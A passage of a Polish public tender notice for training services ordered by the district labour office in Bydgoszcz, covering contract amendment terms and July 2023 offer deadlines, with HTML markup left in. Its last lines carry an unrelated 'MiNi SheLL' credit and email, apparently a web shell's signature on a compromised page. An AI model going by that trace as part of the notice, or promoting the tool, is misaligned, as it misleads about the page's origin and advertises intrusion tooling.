zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców. 6. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający w zakresie każdej części zamówienia przewiduje możliwość dokonania zmian postanowień umowy w przypadku, gdy zmiana ma charakter nieistotny, a także w przypadku: 1) zmiany miejsca realizacji szkolenia, w sytuacji, gdy zmiana miejsca będzie spowodowana przyczynami niezależnymi od Wykonawcy (np. działanie siły wyższej – zdarzenia nadzwyczajne, zewnętrzne i niemożliwe do zapobieżenia i przewidzenia, tj. awaria prądu, zniszczenie obiektu). Wykonawca zobowiązany jest do przedstawienia Zamawiającemu pisemnie powodów, dla których chce zmienić miejsce realizacji szkolenia wraz ze wskazaniem nowego adresu i opisem nowej bazy dydaktycznej. Nowe miejsce realizacji szkolenia musi spełniać wymagania Zamawiającego określone w SWZ; 2) zmiany terminu realizacji szkolenia, w sytuacji, gdy zmiana terminu będzie spowodowana przyczynami niezależnymi od Wykonawcy lub Zamawiającego (np. działanie siły wyższej – zdarzenia nadzwyczajne, zewnętrzne i niemożliwe do zapobieżenia i przewidzenia w tym, np. śmierć, choroba wykładowcy lub trudności ze skompletowaniem grupy osób bezrobotnych i poszukujących pracy, będących odbiorcami przedmiotu zamówienia z przyczyn niezależnych od Zamawiającego). Zamawiający wyznaczy w porozumieniu z Wykonawcą nowy termin wykonania zamówienia; 3) zmiany dokumentacji szkolenia m.in. suplementu, szczegółowego harmonogramu szkolenia, jeżeli przyczyny te są obiektywne i których nie można było wcześniej przewidzieć (np. zmiana przepisów prawa, zmiana uczestników szkolenia, zmiana źródła finansowania), a zmiany te są niezbędne do prawidłowego i efektywnego zakończenia szkolenia; 4) zmiany prognozowanego terminu rozpoczęcia szkoleń o maksymalnie 1 miesiąc w przypadku trudności ze skompletowaniem grupy osób bezrobotnych i poszukujących pracy, będących odbiorcami przedmiotu umowy; 5) gdy zmiana umowy jest niezbędna w zakresie realizacji projektów realizowanych ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Plus, w szczególności gdy zmiany będą wynikać z przekazanych Powiatowemu Urzędowi Pracy w Bydgoszczy wytycznych; 6) zmiany przepisów prawa lub wydania przez odpowiednie organy nowych wytycznych lub interpretacji, w tym dotyczących stosowania przepisów dotyczących ochrony i przetwarzania danych osobowych. 2. Zmiana treści umowy wymaga uprzedniego złożenia na piśmie wniosku Strony, najpóźniej w dniu zaistnienia okoliczności uzasadniających zmianę, wskazującego zasadność wprowadzenia zmian i zgody drugiej Strony na jej dokonanie. 3. Zmiany treści niniejszej umowy wymagają formy pisemnej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-07-21 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę składa się, pod rygorem nieważności, za pośrednictwem Platformy e-Zamówienia pod adresem: http://ezamowienia.gov.pl w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Sposób złożenia oferty został wskazany w Rozdziale XIII SWZ.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-07-21 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-08-19</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Doprecyzowanie okresu realizacji zamówienia zostało wskazane w opisach przedmiotu zamówienia dla każdej części

Creat By MiNi SheLL
Email: jattceo@gmail.com